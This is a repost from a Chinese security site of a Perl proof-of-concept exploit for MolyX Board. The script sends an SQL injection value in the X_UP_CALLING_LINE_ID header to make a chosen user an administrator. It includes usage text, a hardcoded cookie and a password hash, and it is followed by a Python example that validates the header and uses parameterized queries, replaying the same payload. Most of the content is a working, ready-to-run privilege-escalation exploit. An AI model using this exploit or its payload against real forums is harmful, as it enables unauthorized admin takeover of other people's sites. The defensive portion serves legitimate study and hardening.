molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit

admin, 2017-04-09 08:06:49

Source: Sebug.net
# molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit
#!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * work only with php5 or php4&&GPC=off
## Example:
## C:\>mlexp.pl 127.0.0.1 /bbs/ 1
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] Expoilted! Maybe Id=1 is Admin Now!!
##
if (@ARGV < 3)
{
    print "\n\n";
    print "|****************************************************************|\n";
    print " mlexp.pl\n";
    print " molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit (POC version)\n";
    print " Usage: mlexp.pl <server> <folder> <user_id> \n";
    print " e.g.: mlexp.pl 127.0.0.1 /bbs/ 1\n";
    print " [~] <server> - server ip\n";
    print " [~] <folder> - forum folder\n";
    print " [~] <user_id> - user id \n";
    print "|****************************************************************|\n";
    print "\n\n";
    exit(1);
}
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
    Proto => "tcp",
    PeerAddr => "$server",
    PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';
# Value sent in the X_UP_CALLING_LINE_ID request header: a quote that ends a
# quoted string, followed by a usergroupid assignment and a WHERE clause.
$evildata="0',usergroupid=4 where id=$user_id/*";
$script='/wap/associate.php?do=1';
$path =$folder.$script;
$count=$count+1;
$message = "POST ".$folder." HTTP/1.1\r\n";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n";
$message .= "Referer: http://".$server.$folder."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
print $socket "$message";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
    # The pattern is the forum's "operation completed successfully" message.
    if ($answer =~ /操作成功完成/) {
        print "[+] Expoilted! Maybe Id=$user_id is Admin Now!!\n";
    } else {
        print "[-] exploit failed\n";
    }
}
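
A defensive counterpart to the listing above, added here and not part of the original post or of MolyX Board's code: the header value is checked against an allow-list before use and is written with a bound parameter, so the quote in the value from the listing stays data. The table `user_demo`, the `mobile` column, the hyphenated header spelling, the phone-number format and the host `forum.example` are assumptions made for the example.

```python
import re
import sqlite3

# Header spellings checked: the one in the listing and the hyphenated form
# (the hyphenated form is an assumption).
HEADER_NAMES = {"x_up_calling_line_id", "x-up-calling-line-id"}
# Assumption: a legitimate value is a phone number (optional +, 5-15 digits).
MSISDN_RE = re.compile(r"\+?[0-9]{5,15}")


def calling_line_id(raw_request):
    """Return the calling-line-id header value from a raw HTTP request, or None."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() in HEADER_NAMES:
            return value.strip()
    return None


def is_valid_msisdn(value):
    """Allow-list check: accept only a plain phone number."""
    return value is not None and MSISDN_RE.fullmatch(value) is not None


def store_number(db, user_id, value):
    """Bind the value as a parameter so it can never become SQL syntax."""
    db.execute("UPDATE user_demo SET mobile = ? WHERE id = ?", (value, user_id))


def demo():
    # Constructed requests: one benign, one carrying the value from the listing.
    benign = "POST /bbs/ HTTP/1.1\r\nHost: forum.example\r\nX-Up-Calling-Line-ID: +8613800000000\r\n\r\n"
    hostile = "POST /bbs/ HTTP/1.1\r\nHost: forum.example\r\nX_UP_CALLING_LINE_ID: 0',usergroupid=4 where id=1/*\r\n\r\n"
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_demo (id INTEGER PRIMARY KEY, usergroupid INTEGER, mobile TEXT)")
    db.execute("INSERT INTO user_demo VALUES (1, 3, '')")
    verdicts = [is_valid_msisdn(calling_line_id(r)) for r in (benign, hostile)]
    # Even if validation were skipped, a bound parameter stays data.
    store_number(db, 1, calling_line_id(hostile))
    group, mobile = db.execute("SELECT usergroupid, mobile FROM user_demo WHERE id = 1").fetchone()
    return verdicts, group, mobile


if __name__ == "__main__":
    print(demo())
```

In the demo the group column keeps its original value and the whole header string lands in `mobile`; in practice the allow-list check would reject the request before any write.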

Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided for security research and teaching only. Readers who use this information for other purposes bear all legal and joint liability; this site bears no legal or joint liability. If you have questions, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).

  • Published on 2017-04-09 08:06:49
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work): https://cn-sec.com/archives/46444.html